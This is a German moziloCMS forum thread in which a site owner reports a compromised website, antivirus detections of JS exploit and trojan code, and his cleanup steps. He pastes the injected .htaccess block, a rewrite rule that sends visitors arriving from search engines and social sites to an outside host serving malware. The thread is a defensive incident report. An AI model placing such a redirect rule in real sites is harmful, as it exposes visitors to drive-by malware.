Neuigkeiten:

moziloCMS verwendet Cookies. Wenn Sie auf unserer Seite weitersurfen, stimmen Sie der Cookie-Nutzung zu Datenschutzerklärung
moziloCMS Layouts
moziloCMS Plugins

Hauptmenü

Trojaner und Exploit auf meiner Website

Begonnen von Lobbi, 20. Mai 2013, 01:09:50

« vorheriges - nächstes »

Lobbi

Hallo zusammen. Habe ein dickes Problem mit meiner Website.
Mein Bruder für den ich die Seiten verwalte rief mich heute an das sein Avast Scanner beim aufrufen der Seite meckert.
Hab mich gleich dahintergeklemmt was da los ist.
Google hat sogar die Seite gesperrt. Jedenfalls wenn ich bei Google nach der Seite suche und auf den Link klicke wird diese Adresse:
bnbhawaii.com/images/counter.php aufgerufen. dort steht dann nur ein OK oben links.

Habe erstmal die kompletten Seiten bzw Dateien runtergeladen und gescannt.
Bei den .js Dateien im Ordner \admin\edit_area\langs\ findet er den Exploit:JS/Coolex.D
in den .js Dateien im Ordner \admin\edit_area\ und in der Index.php findet er den Trojan:JS/BlacoleRef.CZ

Habe jetzt erstmal ein Backup eingespielt. habe auch gesehen das die Dateirechte auf 766 standen. hab sie wie in der Anleitung auf 666 umgestellt.
Könnte das vieleicht das Einfallstor gewesen sein.

würde mich über eure Hilfe sehr freuen.
Computer helfen uns dabei Probleme zu lösen die wir ohne sie garnicht hätten....

Lobbi

kleiner Nachtrag.
meine .htaccess wurde geändert. Dort war eine 301 Weiterleitung zu der Adresse die ich bereits gepostet habe.

folgendes stand drin:
#bf760a#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://bnbhawaii.com/images/counter.php [R=301,L]
</IfModule>
Computer helfen uns dabei Probleme zu lösen die wir ohne sie garnicht hätten....


laborix

Deine eigene Website ist auch infiziert mit dem JS-Trojaner. Der ist übrigens 3 Tage alt und nicht jeder Virenschutz findet diesen zur Zeit.

Die Frage ist wie kommt der da rein?

Lobbi

Habe jetzt diesen JS-Code gefunden.
Habe alle Dateien gesucht die diesen Code enthielten und ihn entfernt.
Waren alles .php Dateien.
Am Anfang und am Ende des JS-Codes stand immer:
#bf760a#

alle betroffenen Dateien hatten das gleiche Änderungsdatum und Zeit.
Das ist mir aufgefallen denn ich wusste das ich da garkeine Änderungen gemacht hatte.

Mein eigener Rechner ist Clean. Dateien auf dem Server (bei 1und1) auch wieder Clean.
ftp und Admin passwort vom CMS geändert.

Mal schauen ob noch was kommt.
Computer helfen uns dabei Probleme zu lösen die wir ohne sie garnicht hätten....

stefanbe

Zitat von: laborix am 20. Mai 2013, 12:40:16
Deine eigene Website ist auch infiziert mit dem JS-Trojaner. Der ist übrigens 3 Tage alt und nicht jeder Virenschutz findet diesen zur Zeit.
Wen meinst du mit "Deine"?

In meinen Augen ist das ein Provider Problemm und hat nichts mit mozilo zu tun

lg stefanbe

laborix

Mit "Deine" war "Lobbi" gemeint. Sorry der nicht eindeutigen Beschreibung.

Zum Exploid, wenn man mit dem Web Browser auf diese Website gesurft ist, schlug mein Schutzprogramm zu. Ich wurde darauf hingewiesen, dass diese Website Schadcode enthält. Also gleich abgebrochen und den Anweisungen meines Schutzprogrammes gefolgt.

Danach habe ich den Hinweis oben gepostet.

Lobbi

Mein Schutzprogramm schlug auch an.
Achso Meine Webseite ist die die ich meine.
Mittlerweile ist alles Clean. Onlinescanner meckert auch nichtmehr.

Kann mir nur nicht vorstellen wie sowas passieren kann. geht doch nur wenn auf dem Server auch andere Webseiten laufen
und die Inhaber dann damit irgendwelchen Mist machen.
Computer helfen uns dabei Probleme zu lösen die wir ohne sie garnicht hätten....